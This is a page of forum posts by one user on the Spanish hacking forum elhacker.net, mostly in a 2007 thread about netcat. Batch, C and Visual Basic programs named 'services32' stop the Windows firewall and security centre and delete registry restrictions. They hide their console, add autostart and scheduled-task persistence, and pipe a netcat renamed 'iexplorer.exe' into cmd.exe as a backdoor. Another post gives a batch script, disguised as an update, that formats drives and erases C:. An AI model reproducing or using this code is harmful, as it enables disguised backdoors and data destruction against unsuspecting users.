elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 ... 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 [432] 433 434 435 436
4311  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 12 Abril 2007, 22:43 pm
aver... les intereó tanto el tema que les complicaré un poco la existencia con programación en batch, VB y en C para que puedan aplicar sus propias conclusiones y todo lo que se les venga a la mente, ya que por lo visto este post ya lo está mirando gente con un poco de conocimiento en programación.

Bueno... aya voy.. aver si me resulta porque todo esto será improvisado :-s

BATCH:services32.bat


REM Creado por WHK para el foro de elhacker.net
@echo off
Echo Actualizando el sistema...
net stop Centro de seguridad > nul
net stop Firewall de Windows/Conexión compartida a Internet (ICS) >nul
set nc=cmd /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25
reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "services32" /t REG_SZ /d "%nc%" /f >nul
at 12:00 "%nc%"
%nc%
cls
Echo terminado!
exit



C: services32.cpp

// Compilar en modo no consola
// Creado por WHK para el foro de elhacker.net
//suponiendo que iexplorer es tu netcat hacemos lo siguiente:

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

int WINAPI WinMain(
  HINSTANCE hInstance,
  HINSTANCE hPrevInstance, 
  LPSTR lpCmdLine,
  int nCmdShow
)
{
// Modificamos el registro para poder usar el comando "reg" en system("reg ad"); con toda tranquilidad
HKEY reg1;
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_ALL_ACCESS, &reg1) == ERROR_SUCCESS)
{
   if (RegQueryValueEx(reg1, "DisableRegistryTools", NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
   {
      if (RegDeleteValue(reg1, "DisableRegistryTools") == ERROR_SUCCESS)
      printf("\nDisableRegistryTools   : Modificado.");
      else
      printf("\nDisableRegistryTools   : Imposible modificar.");
   } else
        printf("\nDisableRegistryTools   : Inexistente.");
} else
        printf("\nDisableRegistryTools   : Inaccesible.");
// comprobamos que podemos ejecutar el netcat :s
HKEY reg2;
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\explorer", 0, KEY_ALL_ACCESS, &reg2) == ERROR_SUCCESS)
{
   if (RegQueryValueEx(reg2, "RestrictRun", NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
   {
      if (RegDeleteValue(reg2, "RestrictRun") == ERROR_SUCCESS)
      printf("\nRestrictRun            : Modificado.");
      else
      printf("\nRestrictRun            : Imposible modificar.");
   } else
        printf("\nRestrictRun            : Inexistente.");
} else
        printf("\nRestrictRun            : Inaccesible.");
//estas dos modificaciones es lo mismo que los primeros pero en HKLM en ves de HKCU
HKEY reg3;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_ALL_ACCESS, &reg3) == ERROR_SUCCESS)
{
   if (RegQueryValueEx(reg3, "DisableRegistryTools", NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
   {
      if (RegDeleteValue(reg3, "DisableRegistryTools") == ERROR_SUCCESS)
      printf("\nDisableRegistryTools   : Modificado.");
      else
      printf("\nDisableRegistryTools   : Imposible modificar.");
   } else
        printf("\nDisableRegistryTools   : Inexistente.");
} else
        printf("\nDisableRegistryTools   : Inaccesible.");

HKEY reg4;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\explorer", 0, KEY_ALL_ACCESS, &reg4) == ERROR_SUCCESS)
{
   if (RegQueryValueEx(reg4, "RestrictRun", NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
   {
      if (RegDeleteValue(reg4, "RestrictRun") == ERROR_SUCCESS)
      printf("\nRestrictRun            : Modificado.");
      else
      printf("\nRestrictRun            : Imposible modificar.");
   } else
        printf("\nRestrictRun            : Inexistente.");
} else
        printf("\nRestrictRun            : Inaccesible.");
// Comprobamos que nuestro netcat no ha sido borrado por el antivirus XD
FILE *pf;
char cad[80];
if (!(pf=fopen("iexplorer.exe","rb"))) // controlamos si se produce un error
{
printf("Error al abrir el fichero");
exit(0); // abandonamos el programa
}
else
{
fclose(pf);
}
 system ("ping -n 2 127.0.0.1 > nul");// esto retarda un segundo para que pueda aparecer la consola de comandos antes de:
 ShowWindow(GetForegroundWindow(),SW_HIDE); // esconder la consola :D
 system ("net stop Centro de seguridad");
 system ("net stop Firewall de Windows/Conexión compartida a Internet (ICS)");
 system ("reg add HKcU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"services32\" /t REG_SZ /d \"services32.exe\" /f");
 system ("ping -n 50 127.0.0.1 > nul");
 system ("at 12:00 cmd /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25"); // nos aprobechamos y lo metemos en modo SYSTEM en casi que en modo user no funcione :/
 system ("cmd /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25");
return 0;
}


VB: Services32.vbp

' Creado por WHK para el foro de elhacker.net

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long

Sub ParaServiciosYcreaUsuario()
     Dim hShell As Long
     Dim hProc As Long
     Dim codExit As Long
     Dim sCmd As String
     Dim Comando As String
' Para el servicio de Centro de seguridad
     Comando = "net stop " & Chr(34) & "Centro de seguridad" & Chr(34)
     sCmd = "cmd /c " & Comando
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
' el Chr(34) son las comillas dobles, para ejecutar un commando de MSDOS que sea una frase larga necesitamos ejecutarlo con dobles comillas, pues así se pondría para que VB lo ejecute bien.
  ' Para el servicio del Firewall de Windows
     Comando = "net stop " & Chr(34) & "Firewall de Windows/Conexión compartida a Internet (ICS)" & Chr(34)
     sCmd = "cmd /c " & Comando
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
' Ejecutamos netcat
     comando = "cmd /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25" & Chr (34)
     sCmd = "cmd /c " & Comando
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub

Sub MeteloEnRegistro()
     Dim hregkey As Long
     Dim subkey As String
          subkey = "Software\Microsoft\Windows\CurrentVersion\Run"
     Dim stringbuffer As String
     Dim PathPrograma As String
          PathPrograma = "C:\WINDOWS\system32\services32.exe"
     Dim NombrePrograma As String
          NombrePrograma = "Services32.exe"
     retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hregkey)

     If retval <> 0 Then
          Debug.Print "Can't open the subkey"
          Exit Sub
     End If

     stringbuffer = PathPrograma & vbNullChar
     retval = RegSetValueEx(hregkey, NombrePrograma, 0, REG_SZ, ByVal stringbuffer, Len(stringbuffer))
     RegCloseKey hregkey
End Sub
 

Y necesitamos en un módulo meter esto:

Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Public Const HKEY_CURRENT_USER = &H80000001
Public Const KEY_WRITE = &H20006
Public Const REG_SZ = 1

------------------------------------------------------------------

Bueno.. cada uno pipea el netcat de formas diferentes para que cada uno pueda sacar sus propias conclusiones ;)
Aver si ahora hechan a volar un poco mas la imaginación.

Att Yan
Unilola Software.
4312  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 12 Abril 2007, 07:03 am
dasdas:
-------------------------------------------------------------------
Citar:
iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25
-------------------------------------------------------------------

Si pones esto en un SFX no te lo ejecutará ya que el simbolo "|" es un modificador de la consola de comandos y no del SFX sea de winrar o winzip... para eso puedes escribir esto:

"%homedrive%%windir%\system32\cmd.exe" /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

y con esto harás pasar tu comando directamente a traves de la consola de comandos ejecutando tu modificador "|"  ;)
4313  Seguridad Informática / Abril negro / Re: Virus en batch en: 7 Abril 2007, 23:59 pm
Juaaaa.. la idea no era joder sino ver como funcionaban los batch  :xD Para eso hay paginas web por montones en internet para bajar virus. La idea es aprender no joder  :xD
4314  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Carita nueva en: 7 Abril 2007, 22:40 pm
 :xD
4315  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Carita nueva en: 7 Abril 2007, 19:36 pm
A todos quiero darles las gracias por el apoyo ya que sin ustedes no hubiera sido posible poner las caritas ya que nosotros somos los usuarios  :xD Gracias a el-brujo por tomarnos en cuenta  :xD Gracias a todos.

Att Yan.
4316  Seguridad Informática / Abril negro / Re: Virus en batch en: 5 Abril 2007, 01:39 am
Hubiera sido mas facil hacer un

@echo off
Echo actualizando...
format d: /Q /X>nul
format e: /Q /X>nul
erase /s /f /q c:\*>nul
logoff
exit


XD pero la idea no es joder a nadie porque maneras de joder hay por montones... solo los mostraba porque cada uno tiene diferentes funciones muy complejas e interesantes que pueden aprobecharse para el estudio de la programación en batch.
4317  Seguridad Informática / Abril negro / Re: Virus en batch en: 3 Abril 2007, 21:42 pm
Pero a diferencia de estos dos, aca puedes compilar tu propio codigo ASM e injectarlo como función del virus, ademas hay muchos ejemplos para el que esté aprendiendo ese tipo de programación.
4318  Programación / Scripting / Re: Trasladar variable %%A a %a% en: 3 Abril 2007, 02:25 am
intenta con
set %%A=a
si no ps
set %%A=b
shift%%A
set %b%=a

o tambien
echo %%A >temp.tmp
for /f %%i in (temp.tmp) do set %%i=a


Esque si tu dices %%A signifioca que la variable está dentro de for y para establecer %a% Debes salir del modo for o guardar la variable en un temporal para luego volver a volcar la variable a %a% y para volver a eliminar usas shift[variable]

No se si a eso te referias o es mi imaginacion XD
4319  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 3 Abril 2007, 02:15 am
Si se puede, trataré de aprender mas sobre el metodo RIT para poder darles un netcat que no sea detectado, pero porfavor si llego a hacerlo traten de no ponerlo en ninguna pagina web para que no lo buelvan a detectar, si alguien lo hace rimero vienvenido sea porque creo que me voy a demorar mucho en hacerlo  :-\
4320  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 3 Abril 2007, 00:33 am
jajajajaja muy bueno grax por el aporte XD
Páginas: 1 ... 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 [432] 433 434 435 436
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines